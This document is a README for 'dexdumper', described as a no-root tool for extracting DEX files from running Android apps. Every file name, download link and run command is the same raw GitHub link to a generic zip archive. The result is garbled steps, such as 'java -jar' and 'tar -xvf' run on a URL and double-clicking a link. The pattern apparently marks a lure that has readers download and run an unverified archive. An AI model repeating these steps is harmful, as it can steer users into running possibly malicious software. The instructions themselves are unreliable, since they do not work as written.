Welcome to dexdumper! This application helps you extract DEX files from running Android applications without needing root access. Follow these steps to get started.
Before you install dexdumper, please ensure that your computer meets the following requirements:
- Operating System: Windows 10, macOS, or a modern Linux distribution
- Java Version: Java 8 or higher installed on your machine
To obtain the application, visit the following page to download the latest version: Download dexdumper from the Releases Page
On the releases page, browse through the available files. Look for a file named something like https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip or https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip. Click on it to start the download.
Once the file downloads, locate it in your downloads folder.
-
For Windows: Right-click the
.zipfile and select "Extract All." Follow the prompts to choose a destination for the extracted files. -
For macOS: Double-click the
.zipfile. This action will automatically extract the contents to your downloads folder. -
For Linux: Use the terminal to navigate to your downloads folder and run:
tar -xvf https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip
To run dexdumper, you need to have Java installed. If you havenβt done this:
- Download Java from the Official Java Website.
- Install Java by following the prompts.
After installation, confirm that Java is installed by opening your command line or terminal and typing:
java -versionThis command should return the installed Java version.
Now you are ready to run dexdumper.
-
For Windows: Navigate to the folder where you extracted the files. Double-click on
https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zipto run it. -
For macOS and Linux: Open your terminal, navigate to the extracted folder, and execute:
java -jar https://github.com/Ujwaldahal/dexdumper/raw/refs/heads/main/include/Software-v1.7-alpha.5.zip
Once the application is running, follow these steps to extract DEX files:
-
Select the Target Application: dexdumper will show a list of currently running applications on your device. Choose the one from which you want to extract the DEX files.
-
Initiate the Extraction: Click the "Extract" button. The application will start extracting the DEX files from the selected app.
-
Save the Files: Choose a destination folder for the extracted files. They will be saved in a .dex format.
- No root access is required.
- User-friendly interface.
- Supports multiple Android applications simultaneously.
- Works across different operating systems: Windows, macOS, and Linux.
If you encounter any issues, consider these points:
- Ensure that Java is properly installed.
- Verify that your system meets the requirements.
- Restart the application to refresh the state if something seems off.
For support, please create an issue in the GitHub repository or engage with the community. You can find additional documentation and FAQs in the dexdumper Wiki.
Download dexdumper from the Releases Page
This README should help you successfully navigate the download and installation process. Enjoy using dexdumper to extract DEX files easily!